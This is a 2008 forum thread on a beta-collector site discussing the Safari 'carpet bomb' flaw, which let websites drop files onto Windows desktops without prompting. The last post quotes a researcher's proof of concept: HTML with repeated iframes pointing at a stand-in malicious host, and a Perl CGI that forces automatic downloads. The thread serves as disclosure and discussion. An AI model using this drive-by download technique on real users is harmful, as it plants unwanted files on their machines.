BetaArchive Logo
Navigation Home Screenshots Image Uploader Server Info FTP Servers Wiki Forum RSS Feed Rules Please Donate
UP: 27d, 22h, 26m | CPU: 15% | MEM: 2658MB of 4561MB used
{The community for beta collectors}

Post new topic Reply to topic  [ 5 posts ] 
Author Message
 PostPost subject: Apples carpet-bomb Safari flaw can wreak havoc on Windows        Posted: Wed Jun 11, 2008 8:07 pm 
Reply with quote
FTP Access
Offline

Joined
Wed Jun 11, 2008 7:27 pm

Posts
140
A researcher has created a proof-of-concept site that graphically demonstrates the risk Windows users face when using Apple's Safari browser.




Microsoft's security team already warned that a "blended threat" was so serious that Windows users should curtail their use of Safari until a security patch is available. This blog post from researcher Liu Die Yu makes it clear the warning was by no means overstated.

Clicking on this link with Safari using default settings automatically downloads a booby-trapped file onto a Windows user's desktop with no prompting. The next time the user opens Internet Explorer, the force-fed file automatically causes the notepad.exe application to launch and open a non-existent file. Of course, miscreants could choose far more nefarious code.

When informed that its browser downloads files with no prompting, Apple said it may get around to changing this behavior at some point. In other words, this is no big deal from a security perspective, so let's all move on. This demo suggests otherwise.

source: neowin.net


Top  Profile
 PostPost subject:        Posted: Wed Jun 11, 2008 8:21 pm 
Reply with quote
Donator
Offline

Joined
Sat Feb 24, 2007 4:14 pm

Posts
6612

Location
United Kingdom

Favourite OS
Server 2012 R2
The thing with this, from what I heard, is that neither can completely fix it without the other. The flaw is in both Safari and Windows. Small holes in both that normally wouldn't be able to be exploited, take effect when used in conjunction.

_________________
BuildFeed - the ultimate collaborative NT build list - Windows Longhorn - a look at a defining Microsoft project


Top  Profile  WWW
 PostPost subject:        Posted: Tue Jun 17, 2008 6:29 pm 
Reply with quote
FTP Access
Offline

Joined
Wed Jun 11, 2008 7:27 pm

Posts
140
well it's another reason not to use safari on windows.


Top  Profile
 PostPost subject:        Posted: Tue Jun 17, 2008 8:11 pm 
Reply with quote
FTP Access
User avatar
Offline

Joined
Fri Sep 01, 2006 10:04 pm

Posts
1022

Location
The Ephemeral between existance and non-existance: AKA "being"

Favourite OS
Rhapsody, BeOS
The only Windows users of Safari are web developers...
What is the flaw?

_________________
Image
Part Time Troll - HPC Enthusiast - Spelling Master - Old Fart


Top  Profile  WWW
 PostPost subject:        Posted: Wed Jun 18, 2008 5:08 am 
Reply with quote
Donator
Offline

Joined
Fri Aug 18, 2006 12:05 pm

Posts
698

Location
Or-stray-liagh
[quote=http://www.dhanjani.com/archives/2008/05/safari_carpet_bomb.html]
Assume you visit a malicious site, http://malicious.example.com/, that serves the following HTML:

<HTML>
<iframe id="frame" src="http://malicious.example.com/cgi-bin/carpet_bomb.cgi"></iframe>
<iframe id="frame" src="http://malicious.example.com/cgi-bin/carpet_bomb.cgi"></iframe>
<iframe id="frame" src="http://malicious.example.com/cgi-bin/carpet_bomb.cgi"></iframe>
...
...
...
...
<iframe id="frame" src="http://malicious.example.com/cgi-bin/carpet_bomb.cgi"></iframe>
</HTML>

Now assume that http://malicious.example.com/cgi-bin/carpet_bomb.cgi is the following:

#!/usr/bin/perl
print "Content-type: blah/blah\n\n"

Since Safari does not know how to render content-type of blah/blah, it will automatically start downloading carpet_bomb.cgi every time it is served.
[/quote]


Such simple exploit code o.O

And of course, Apple is being all arrogant and saying it's a feature not a bug. They said they will consider an "ask before downloading" checkbox in the next version of Safari.

_________________
pr0gram the pr0grammer
BetaArchive retiree | OSBA Expat


Top  Profile
Display posts from previous:  Sort by  
Post new topic Reply to topic  [ 5 posts ] 




Who is online

Users browsing this forum: No registered users and 22 guests


You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum

Search for:
Jump to:  

All views expressed in these forums are those of the author and do not necessarily represent the views of the BetaArchive site owner.

Powered by phpBB® Forum Software © phpBB Group

Copyright © 2006-2018

 

Sitemap | XML | RSS